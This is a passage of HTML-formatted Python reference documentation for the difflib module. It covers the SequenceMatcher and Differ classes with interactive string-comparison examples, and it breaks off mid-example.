<dt id="difflib.IS_CHARACTER_JUNK">
<tt class="descclassname">difflib.</tt><tt class="descname">IS_CHARACTER_JUNK</tt><big>(</big><em>ch</em><big>)</big><a class="headerlink" href="#difflib.IS_CHARACTER_JUNK" title="Permalink to this definition">¶</a></dt>
<dd><p>Return true for ignorable characters. The character <em>ch</em> is ignorable if <em>ch</em>
is a space or tab, otherwise it is not ignorable. Used as a default for
parameter <em>charjunk</em> in <a class="reference internal" href="#difflib.ndiff" title="difflib.ndiff"><tt class="xref py py-func docutils literal"><span class="pre">ndiff()</span></tt></a>.</p>
</dd></dl>
<div class="admonition seealso">
<p class="first admonition-title">See also</p>
<dl class="last docutils">
<dt><a class="reference external" href="http://www.drdobbs.com/database/pattern-matching-the-gestalt-approach/184407970">Pattern Matching: The Gestalt Approach</a></dt>
<dd>Discussion of a similar algorithm by John W. Ratcliff and D. E. Metzener. This
was published in <a class="reference external" href="http://www.drdobbs.com/">Dr. Dobb’s Journal</a> in July, 1988.</dd>
</dl>
</div>
<div class="section" id="sequencematcher-objects">
<span id="sequence-matcher"></span><h2>6.3.1. SequenceMatcher Objects<a class="headerlink" href="#sequencematcher-objects" title="Permalink to this headline">¶</a></h2>
<p>The <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> class has this constructor:</p>
<dl class="class">
<dt>
<em class="property">class </em><tt class="descclassname">difflib.</tt><tt class="descname">SequenceMatcher</tt><big>(</big><em>isjunk=None</em>, <em>a=''</em>, <em>b=''</em>, <em>autojunk=True</em><big>)</big></dt>
<dd><p>Optional argument <em>isjunk</em> must be <tt class="docutils literal"><span class="pre">None</span></tt> (the default) or a one-argument
function that takes a sequence element and returns true if and only if the
element is “junk” and should be ignored. Passing <tt class="docutils literal"><span class="pre">None</span></tt> for <em>isjunk</em> is
equivalent to passing <tt class="docutils literal"><span class="pre">lambda</span> <span class="pre">x:</span> <span class="pre">0</span></tt>; in other words, no elements are ignored.
For example, pass:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span> <span class="ow">in</span> <span class="s">" </span><span class="se">\t</span><span class="s">"</span>
</pre></div>
</div>
<p>if you’re comparing lines as sequences of characters, and don’t want to synch up
on blanks or hard tabs.</p>
<p>The optional arguments <em>a</em> and <em>b</em> are sequences to be compared; both default to
empty strings. The elements of both sequences must be <a class="reference internal" href="../glossary.html#term-hashable"><em class="xref std std-term">hashable</em></a>.</p>
<p>The optional argument <em>autojunk</em> can be used to disable the automatic junk
heuristic.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.2: </span>The <em>autojunk</em> parameter.</p>
</div>
<p>SequenceMatcher objects get three data attributes: <em>bjunk</em> is the
set of elements of <em>b</em> for which <em>isjunk</em> is <tt class="docutils literal"><span class="pre">True</span></tt>; <em>bpopular</em> is the set of
non-junk elements considered popular by the heuristic (if it is not
disabled); <em>b2j</em> is a dict mapping the remaining elements of <em>b</em> to a list
of positions where they occur. All three are reset whenever <em>b</em> is reset
with <a class="reference internal" href="#difflib.SequenceMatcher.set_seqs" title="difflib.SequenceMatcher.set_seqs"><tt class="xref py py-meth docutils literal"><span class="pre">set_seqs()</span></tt></a> or <a class="reference internal" href="#difflib.SequenceMatcher.set_seq2" title="difflib.SequenceMatcher.set_seq2"><tt class="xref py py-meth docutils literal"><span class="pre">set_seq2()</span></tt></a>.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.2: </span>The <em>bjunk</em> and <em>bpopular</em> attributes.</p>
</div>
<p><a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> objects have the following methods:</p>
<dl class="method">
<dt id="difflib.SequenceMatcher.set_seqs">
<tt class="descname">set_seqs</tt><big>(</big><em>a</em>, <em>b</em><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.set_seqs" title="Permalink to this definition">¶</a></dt>
<dd><p>Set the two sequences to be compared.</p>
</dd></dl>
<p><a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> computes and caches detailed information about the
second sequence, so if you want to compare one sequence against many
sequences, use <a class="reference internal" href="#difflib.SequenceMatcher.set_seq2" title="difflib.SequenceMatcher.set_seq2"><tt class="xref py py-meth docutils literal"><span class="pre">set_seq2()</span></tt></a> to set the commonly used sequence once and
call <a class="reference internal" href="#difflib.SequenceMatcher.set_seq1" title="difflib.SequenceMatcher.set_seq1"><tt class="xref py py-meth docutils literal"><span class="pre">set_seq1()</span></tt></a> repeatedly, once for each of the other sequences.</p>
<dl class="method">
<dt id="difflib.SequenceMatcher.set_seq1">
<tt class="descname">set_seq1</tt><big>(</big><em>a</em><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.set_seq1" title="Permalink to this definition">¶</a></dt>
<dd><p>Set the first sequence to be compared. The second sequence to be compared
is not changed.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.set_seq2">
<tt class="descname">set_seq2</tt><big>(</big><em>b</em><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.set_seq2" title="Permalink to this definition">¶</a></dt>
<dd><p>Set the second sequence to be compared. The first sequence to be compared
is not changed.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.find_longest_match">
<tt class="descname">find_longest_match</tt><big>(</big><em>alo</em>, <em>ahi</em>, <em>blo</em>, <em>bhi</em><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.find_longest_match" title="Permalink to this definition">¶</a></dt>
<dd><p>Find longest matching block in <tt class="docutils literal"><span class="pre">a[alo:ahi]</span></tt> and <tt class="docutils literal"><span class="pre">b[blo:bhi]</span></tt>.</p>
<p>If <em>isjunk</em> was omitted or <tt class="docutils literal"><span class="pre">None</span></tt>, <a class="reference internal" href="#difflib.SequenceMatcher.find_longest_match" title="difflib.SequenceMatcher.find_longest_match"><tt class="xref py py-meth docutils literal"><span class="pre">find_longest_match()</span></tt></a> returns
<tt class="docutils literal"><span class="pre">(i,</span> <span class="pre">j,</span> <span class="pre">k)</span></tt> such that <tt class="docutils literal"><span class="pre">a[i:i+k]</span></tt> is equal to <tt class="docutils literal"><span class="pre">b[j:j+k]</span></tt>, where <tt class="docutils literal"><span class="pre">alo</span>
<span class="pre"><=</span> <span class="pre">i</span> <span class="pre"><=</span> <span class="pre">i+k</span> <span class="pre"><=</span> <span class="pre">ahi</span></tt> and <tt class="docutils literal"><span class="pre">blo</span> <span class="pre"><=</span> <span class="pre">j</span> <span class="pre"><=</span> <span class="pre">j+k</span> <span class="pre"><=</span> <span class="pre">bhi</span></tt>. For all <tt class="docutils literal"><span class="pre">(i',</span> <span class="pre">j',</span>
<span class="pre">k')</span></tt> meeting those conditions, the additional conditions <tt class="docutils literal"><span class="pre">k</span> <span class="pre">>=</span> <span class="pre">k'</span></tt>, <tt class="docutils literal"><span class="pre">i</span>
<span class="pre"><=</span> <span class="pre">i'</span></tt>, and if <tt class="docutils literal"><span class="pre">i</span> <span class="pre">==</span> <span class="pre">i'</span></tt>, <tt class="docutils literal"><span class="pre">j</span> <span class="pre"><=</span> <span class="pre">j'</span></tt> are also met. In other words, of
all maximal matching blocks, return one that starts earliest in <em>a</em>, and
of all those maximal matching blocks that start earliest in <em>a</em>, return
the one that starts earliest in <em>b</em>.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">None</span><span class="p">,</span> <span class="s">" abcd"</span><span class="p">,</span> <span class="s">"abcd abcd"</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">find_longest_match</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">9</span><span class="p">)</span>
<span class="go">Match(a=0, b=4, size=5)</span>
</pre></div>
</div>
<p>If <em>isjunk</em> was provided, first the longest matching block is determined
as above, but with the additional restriction that no junk element appears
in the block. Then that block is extended as far as possible by matching
(only) junk elements on both sides. So the resulting block never matches
on junk except as identical junk happens to be adjacent to an interesting
match.</p>
<p>Here’s the same example as before, but considering blanks to be junk. That
prevents <tt class="docutils literal"><span class="pre">'</span> <span class="pre">abcd'</span></tt> from matching the <tt class="docutils literal"><span class="pre">'</span> <span class="pre">abcd'</span></tt> at the tail end of the
second sequence directly. Instead only the <tt class="docutils literal"><span class="pre">'abcd'</span></tt> can match, and
matches the leftmost <tt class="docutils literal"><span class="pre">'abcd'</span></tt> in the second sequence:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="o">==</span><span class="s">" "</span><span class="p">,</span> <span class="s">" abcd"</span><span class="p">,</span> <span class="s">"abcd abcd"</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">find_longest_match</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">9</span><span class="p">)</span>
<span class="go">Match(a=1, b=0, size=4)</span>
</pre></div>
</div>
<p>If no blocks match, this returns <tt class="docutils literal"><span class="pre">(alo,</span> <span class="pre">blo,</span> <span class="pre">0)</span></tt>.</p>
<p>This method returns a <a class="reference internal" href="../glossary.html#term-named-tuple"><em class="xref std std-term">named tuple</em></a> <tt class="docutils literal"><span class="pre">Match(a,</span> <span class="pre">b,</span> <span class="pre">size)</span></tt>.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.get_matching_blocks">
<tt class="descname">get_matching_blocks</tt><big>(</big><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.get_matching_blocks" title="Permalink to this definition">¶</a></dt>
<dd><p>Return list of triples describing matching subsequences. Each triple is of
the form <tt class="docutils literal"><span class="pre">(i,</span> <span class="pre">j,</span> <span class="pre">n)</span></tt>, and means that <tt class="docutils literal"><span class="pre">a[i:i+n]</span> <span class="pre">==</span> <span class="pre">b[j:j+n]</span></tt>. The
triples are monotonically increasing in <em>i</em> and <em>j</em>.</p>
<p>The last triple is a dummy, and has the value <tt class="docutils literal"><span class="pre">(len(a),</span> <span class="pre">len(b),</span> <span class="pre">0)</span></tt>. It
is the only triple with <tt class="docutils literal"><span class="pre">n</span> <span class="pre">==</span> <span class="pre">0</span></tt>. If <tt class="docutils literal"><span class="pre">(i,</span> <span class="pre">j,</span> <span class="pre">n)</span></tt> and <tt class="docutils literal"><span class="pre">(i',</span> <span class="pre">j',</span> <span class="pre">n')</span></tt>
are adjacent triples in the list, and the second is not the last triple in
the list, then <tt class="docutils literal"><span class="pre">i+n</span> <span class="pre">!=</span> <span class="pre">i'</span></tt> or <tt class="docutils literal"><span class="pre">j+n</span> <span class="pre">!=</span> <span class="pre">j'</span></tt>; in other words, adjacent
triples always describe non-adjacent equal blocks.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">None</span><span class="p">,</span> <span class="s">"abxcd"</span><span class="p">,</span> <span class="s">"abcd"</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">get_matching_blocks</span><span class="p">()</span>
<span class="go">[Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]</span>
</pre></div>
</div>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.get_opcodes">
<tt class="descname">get_opcodes</tt><big>(</big><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.get_opcodes" title="Permalink to this definition">¶</a></dt>
<dd><p>Return list of 5-tuples describing how to turn <em>a</em> into <em>b</em>. Each tuple is
of the form <tt class="docutils literal"><span class="pre">(tag,</span> <span class="pre">i1,</span> <span class="pre">i2,</span> <span class="pre">j1,</span> <span class="pre">j2)</span></tt>. The first tuple has <tt class="docutils literal"><span class="pre">i1</span> <span class="pre">==</span> <span class="pre">j1</span> <span class="pre">==</span>
<span class="pre">0</span></tt>, and remaining tuples have <em>i1</em> equal to the <em>i2</em> from the preceding
tuple, and, likewise, <em>j1</em> equal to the previous <em>j2</em>.</p>
<p>The <em>tag</em> values are strings, with these meanings:</p>
<table border="1" class="docutils">
<colgroup>
<col width="25%" />
<col width="75%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Value</th>
<th class="head">Meaning</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td><tt class="docutils literal"><span class="pre">'replace'</span></tt></td>
<td><tt class="docutils literal"><span class="pre">a[i1:i2]</span></tt> should be replaced by
<tt class="docutils literal"><span class="pre">b[j1:j2]</span></tt>.</td>
</tr>
<tr class="row-odd"><td><tt class="docutils literal"><span class="pre">'delete'</span></tt></td>
<td><tt class="docutils literal"><span class="pre">a[i1:i2]</span></tt> should be deleted. Note that
<tt class="docutils literal"><span class="pre">j1</span> <span class="pre">==</span> <span class="pre">j2</span></tt> in this case.</td>
</tr>
<tr class="row-even"><td><tt class="docutils literal"><span class="pre">'insert'</span></tt></td>
<td><tt class="docutils literal"><span class="pre">b[j1:j2]</span></tt> should be inserted at
<tt class="docutils literal"><span class="pre">a[i1:i1]</span></tt>. Note that <tt class="docutils literal"><span class="pre">i1</span> <span class="pre">==</span> <span class="pre">i2</span></tt> in
this case.</td>
</tr>
<tr class="row-odd"><td><tt class="docutils literal"><span class="pre">'equal'</span></tt></td>
<td><tt class="docutils literal"><span class="pre">a[i1:i2]</span> <span class="pre">==</span> <span class="pre">b[j1:j2]</span></tt> (the sub-sequences
are equal).</td>
</tr>
</tbody>
</table>
<p>For example:</p>
<blockquote>
<div><div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">a</span> <span class="o">=</span> <span class="s">"qabxcd"</span>
<span class="gp">>>> </span><span class="n">b</span> <span class="o">=</span> <span class="s">"abycdf"</span>
<span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">None</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span>
<span class="gp">>>> </span><span class="k">for</span> <span class="n">tag</span><span class="p">,</span> <span class="n">i1</span><span class="p">,</span> <span class="n">i2</span><span class="p">,</span> <span class="n">j1</span><span class="p">,</span> <span class="n">j2</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">get_opcodes</span><span class="p">():</span>
<span class="go"> print('{:7} a[{}:{}] --> b[{}:{}] {!r:>8} --> {!r}'.format(</span>
<span class="go"> tag, i1, i2, j1, j2, a[i1:i2], b[j1:j2]))</span>
</pre></div>
</div>
<p>delete a[0:1] –> b[0:0] ‘q’ –> ‘’
equal a[1:3] –> b[0:2] ‘ab’ –> ‘ab’
replace a[3:4] –> b[2:3] ‘x’ –> ‘y’
equal a[4:6] –> b[3:5] ‘cd’ –> ‘cd’
insert a[6:6] –> b[5:6] ‘’ –> ‘f’</p>
</div></blockquote>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.get_grouped_opcodes">
<tt class="descname">get_grouped_opcodes</tt><big>(</big><em>n=3</em><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.get_grouped_opcodes" title="Permalink to this definition">¶</a></dt>
<dd><p>Return a <a class="reference internal" href="../glossary.html#term-generator"><em class="xref std std-term">generator</em></a> of groups with up to <em>n</em> lines of context.</p>
<p>Starting with the groups returned by <a class="reference internal" href="#difflib.SequenceMatcher.get_opcodes" title="difflib.SequenceMatcher.get_opcodes"><tt class="xref py py-meth docutils literal"><span class="pre">get_opcodes()</span></tt></a>, this method
splits out smaller change clusters and eliminates intervening ranges which
have no changes.</p>
<p>The groups are returned in the same format as <a class="reference internal" href="#difflib.SequenceMatcher.get_opcodes" title="difflib.SequenceMatcher.get_opcodes"><tt class="xref py py-meth docutils literal"><span class="pre">get_opcodes()</span></tt></a>.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.ratio">
<tt class="descname">ratio</tt><big>(</big><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.ratio" title="Permalink to this definition">¶</a></dt>
<dd><p>Return a measure of the sequences’ similarity as a float in the range [0,
1].</p>
<p>Where T is the total number of elements in both sequences, and M is the
number of matches, this is 2.0*M / T. Note that this is <tt class="docutils literal"><span class="pre">1.0</span></tt> if the
sequences are identical, and <tt class="docutils literal"><span class="pre">0.0</span></tt> if they have nothing in common.</p>
<p>This is expensive to compute if <a class="reference internal" href="#difflib.SequenceMatcher.get_matching_blocks" title="difflib.SequenceMatcher.get_matching_blocks"><tt class="xref py py-meth docutils literal"><span class="pre">get_matching_blocks()</span></tt></a> or
<a class="reference internal" href="#difflib.SequenceMatcher.get_opcodes" title="difflib.SequenceMatcher.get_opcodes"><tt class="xref py py-meth docutils literal"><span class="pre">get_opcodes()</span></tt></a> hasn’t already been called, in which case you may want
to try <a class="reference internal" href="#difflib.SequenceMatcher.quick_ratio" title="difflib.SequenceMatcher.quick_ratio"><tt class="xref py py-meth docutils literal"><span class="pre">quick_ratio()</span></tt></a> or <a class="reference internal" href="#difflib.SequenceMatcher.real_quick_ratio" title="difflib.SequenceMatcher.real_quick_ratio"><tt class="xref py py-meth docutils literal"><span class="pre">real_quick_ratio()</span></tt></a> first to get an
upper bound.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.quick_ratio">
<tt class="descname">quick_ratio</tt><big>(</big><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.quick_ratio" title="Permalink to this definition">¶</a></dt>
<dd><p>Return an upper bound on <a class="reference internal" href="#difflib.SequenceMatcher.ratio" title="difflib.SequenceMatcher.ratio"><tt class="xref py py-meth docutils literal"><span class="pre">ratio()</span></tt></a> relatively quickly.</p>
</dd></dl>
<dl class="method">
<dt id="difflib.SequenceMatcher.real_quick_ratio">
<tt class="descname">real_quick_ratio</tt><big>(</big><big>)</big><a class="headerlink" href="#difflib.SequenceMatcher.real_quick_ratio" title="Permalink to this definition">¶</a></dt>
<dd><p>Return an upper bound on <a class="reference internal" href="#difflib.SequenceMatcher.ratio" title="difflib.SequenceMatcher.ratio"><tt class="xref py py-meth docutils literal"><span class="pre">ratio()</span></tt></a> very quickly.</p>
</dd></dl>
</dd></dl>
<p>The three methods that return the ratio of matching to total characters can give
different results due to differing levels of approximation, although
<tt class="xref py py-meth docutils literal"><span class="pre">quick_ratio()</span></tt> and <tt class="xref py py-meth docutils literal"><span class="pre">real_quick_ratio()</span></tt> are always at least as large as
<tt class="xref py py-meth docutils literal"><span class="pre">ratio()</span></tt>:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">None</span><span class="p">,</span> <span class="s">"abcd"</span><span class="p">,</span> <span class="s">"bcde"</span><span class="p">)</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="go">0.75</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">quick_ratio</span><span class="p">()</span>
<span class="go">0.75</span>
<span class="gp">>>> </span><span class="n">s</span><span class="o">.</span><span class="n">real_quick_ratio</span><span class="p">()</span>
<span class="go">1.0</span>
</pre></div>
</div>
</div>
<div class="section" id="sequencematcher-examples">
<span id="id1"></span><h2>6.3.2. SequenceMatcher Examples<a class="headerlink" href="#sequencematcher-examples" title="Permalink to this headline">¶</a></h2>
<p>This example compares two strings, considering blanks to be “junk”:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s</span> <span class="o">=</span> <span class="n">SequenceMatcher</span><span class="p">(</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span> <span class="o">==</span> <span class="s">" "</span><span class="p">,</span>
<span class="gp">... </span> <span class="s">"private Thread currentThread;"</span><span class="p">,</span>
<span class="gp">... </span> <span class="s">"private volatile Thread currentThread;"</span><span class="p">)</span>
</pre></div>
</div>
<p><tt class="xref py py-meth docutils literal"><span class="pre">ratio()</span></tt> returns a float in [0, 1], measuring the similarity of the
sequences. As a rule of thumb, a <tt class="xref py py-meth docutils literal"><span class="pre">ratio()</span></tt> value over 0.6 means the
sequences are close matches:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="nb">print</span><span class="p">(</span><span class="nb">round</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">ratio</span><span class="p">(),</span> <span class="mi">3</span><span class="p">))</span>
<span class="go">0.866</span>
</pre></div>
</div>
<p>If you’re only interested in where the sequences match,
<tt class="xref py py-meth docutils literal"><span class="pre">get_matching_blocks()</span></tt> is handy:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="k">for</span> <span class="n">block</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">get_matching_blocks</span><span class="p">():</span>
<span class="gp">... </span> <span class="nb">print</span><span class="p">(</span><span class="s">"a[%d] and b[%d] match for %d elements"</span> <span class="o">%</span> <span class="n">block</span><span class="p">)</span>
<span class="go">a[0] and b[0] match for 8 elements</span>
<span class="go">a[8] and b[17] match for 21 elements</span>
<span class="go">a[29] and b[38] match for 0 elements</span>
</pre></div>
</div>
<p>Note that the last tuple returned by <tt class="xref py py-meth docutils literal"><span class="pre">get_matching_blocks()</span></tt> is always a
dummy, <tt class="docutils literal"><span class="pre">(len(a),</span> <span class="pre">len(b),</span> <span class="pre">0)</span></tt>, and this is the only case in which the last
tuple element (number of elements matched) is <tt class="docutils literal"><span class="pre">0</span></tt>.</p>
<p>If you want to know how to change the first sequence into the second, use
<tt class="xref py py-meth docutils literal"><span class="pre">get_opcodes()</span></tt>:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="k">for</span> <span class="n">opcode</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">get_opcodes</span><span class="p">():</span>
<span class="gp">... </span> <span class="nb">print</span><span class="p">(</span><span class="s">"%6s a[%d:%d] b[%d:%d]"</span> <span class="o">%</span> <span class="n">opcode</span><span class="p">)</span>
<span class="go"> equal a[0:8] b[0:8]</span>
<span class="go">insert a[8:8] b[8:17]</span>
<span class="go"> equal a[8:29] b[17:38]</span>
</pre></div>
</div>
<div class="admonition seealso">
<p class="first admonition-title">See also</p>
<ul class="last simple">
<li>The <a class="reference internal" href="#difflib.get_close_matches" title="difflib.get_close_matches"><tt class="xref py py-func docutils literal"><span class="pre">get_close_matches()</span></tt></a> function in this module which shows how
simple code building on <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> can be used to do useful
work.</li>
<li><a class="reference external" href="http://code.activestate.com/recipes/576729/">Simple version control recipe</a> for a small application
built with <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a>.</li>
</ul>
</div>
</div>
<div class="section" id="differ-objects">
<span id="id2"></span><h2>6.3.3. Differ Objects<a class="headerlink" href="#differ-objects" title="Permalink to this headline">¶</a></h2>
<p>Note that <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a>-generated deltas make no claim to be <strong>minimal</strong>
diffs. To the contrary, minimal diffs are often counter-intuitive, because they
synch up anywhere possible, sometimes accidental matches 100 pages apart.
Restricting synch points to contiguous matches preserves some notion of
locality, at the occasional cost of producing a longer diff.</p>
<p>The <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a> class has this constructor:</p>
<dl class="class">
<dt>
<em class="property">class </em><tt class="descclassname">difflib.</tt><tt class="descname">Differ</tt><big>(</big><em>linejunk=None</em>, <em>charjunk=None</em><big>)</big></dt>
<dd><p>Optional keyword parameters <em>linejunk</em> and <em>charjunk</em> are for filter functions
(or <tt class="docutils literal"><span class="pre">None</span></tt>):</p>
<p><em>linejunk</em>: A function that accepts a single string argument, and returns true
if the string is junk. The default is <tt class="docutils literal"><span class="pre">None</span></tt>, meaning that no line is
considered junk.</p>
<p><em>charjunk</em>: A function that accepts a single character argument (a string of
length 1), and returns true if the character is junk. The default is <tt class="docutils literal"><span class="pre">None</span></tt>,
meaning that no character is considered junk.</p>
<p><a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a> objects are used (deltas generated) via a single method:</p>
<dl class="method">
<dt id="difflib.Differ.compare">
<tt class="descname">compare</tt><big>(</big><em>a</em>, <em>b</em><big>)</big><a class="headerlink" href="#difflib.Differ.compare" title="Permalink to this definition">¶</a></dt>
<dd><p>Compare two sequences of lines, and generate the delta (a sequence of lines).</p>
<p>Each sequence must contain individual single-line strings ending with
newlines. Such sequences can be obtained from the
<a class="reference internal" href="io.html#io.IOBase.readlines" title="io.IOBase.readlines"><tt class="xref py py-meth docutils literal"><span class="pre">readlines()</span></tt></a> method of file-like objects. The delta
generated also consists of newline-terminated strings, ready to be
printed as-is via the <a class="reference internal" href="io.html#io.IOBase.writelines" title="io.IOBase.writelines"><tt class="xref py py-meth docutils literal"><span class="pre">writelines()</span></tt></a> method of a
file-like object.</p>
</dd></dl>
</dd></dl>
</div>
<div class="section" id="differ-example">
<span id="differ-examples"></span><h2>6.3.4. Differ Example<a class="headerlink" href="#differ-example" title="Permalink to this headline">¶</a></h2>
<p>This example compares two texts. First we set up the texts, sequences of
individual single-line strings ending with newlines (such sequences can also be
obtained from the <tt class="xref py py-meth docutils literal"><span class="pre">readlines()</span></tt> method of file-like objects):</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">text1</span> <span class="o">=</span> <span class="s">''' 1. Beautiful is better than ugly.</span>
<span class="gp">... </span><span class="s"> 2. Explicit is better than implicit.</span>
<span class="gp">... </span><span class="s"> 3. Simple is better than complex.</span>
<span class="gp">... </span><span class="s"> 4. Complex is better than complicated.</span>
<span class="gp">... </span><span class="s">'''</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="gp">>>> </span><span class="nb">len</span><span class="p">(</span><span class="n">text1</span><span class="p">)</span>
<span class="go">4</span>
<span class="gp">>>> </span><span class="n">text1</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="go">'\n'</span>
<span class="gp">>>> </span><span class="n">text2</span> <span class="o">=</span> <span class="s">''' 1. Beautiful is better than ugly.</span>
<span class="gp">... </span><span class="s"> 3. Simple is better than complex.</span>
<span class="gp">... </span><span class="s"> 4. Complicated is better than complex.</span>
<span class="gp">... </span><span class="s"> 5. Flat is better than nested.</span>
<span class="gp">... </span><span class="s">'''</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
</pre></div>
</div>
<p>Next we instantiate a Differ object:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">d</span> <span class="o">=</span> <span class="n">Differ</span><span class="p">()</span>
</pre></div>
</div>
<p>Note that when instantiating a <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a> object we may pass functions to
filter out line and character “junk.” See the <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-meth docutils literal"><span class="pre">Differ()</span></tt></a> constructor for
details.</p>
<p>Finally, we compare the two:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">result</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">d</span><span class="o">.</span><span class="n">compare</span><span class="p">(</span><span class="n">text1</span><span class="p">,</span> <span class="n">text2</span><span class="p">))</span>
</pre></div>
</div>
<p><tt class="docutils literal"><span class="pre">result</span></tt> is a list of strings, so let’s pretty-print it:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="kn">from</span> <span class="nn">pprint</span> <span class="k">import</span> <span class="n">pprint</span>
<span class="gp">>>> </span><span class="n">pprint</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
<span class="go">[' 1. Beautiful is better than ugly.\n',</span>
<span class="go"> '- 2. Explicit is better than implicit.\n',</span>
<span class="go"> '- 3. Simple is better than complex.\n',</span>
<span class="go"> '+ 3. Simple is better than complex.\n',</span>
<span class="go"> '? ++\n',</span>
<span class="go"> '- 4. Complex is better than complicated.\n',</span>
<span class="go"> '? ^ ---- ^\n',</span>
<span class="go"> '+ 4. Complicated is better than complex.\n',</span>
<span class="go"> '? ++++ ^ ^\n',</span>
<span class="go"> '+ 5. Flat is better than nested.\n']</span>
</pre></div>
</div>
<p>As a single multi-line string it looks like this:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="kn">import</span> <span class="nn">sys</span>
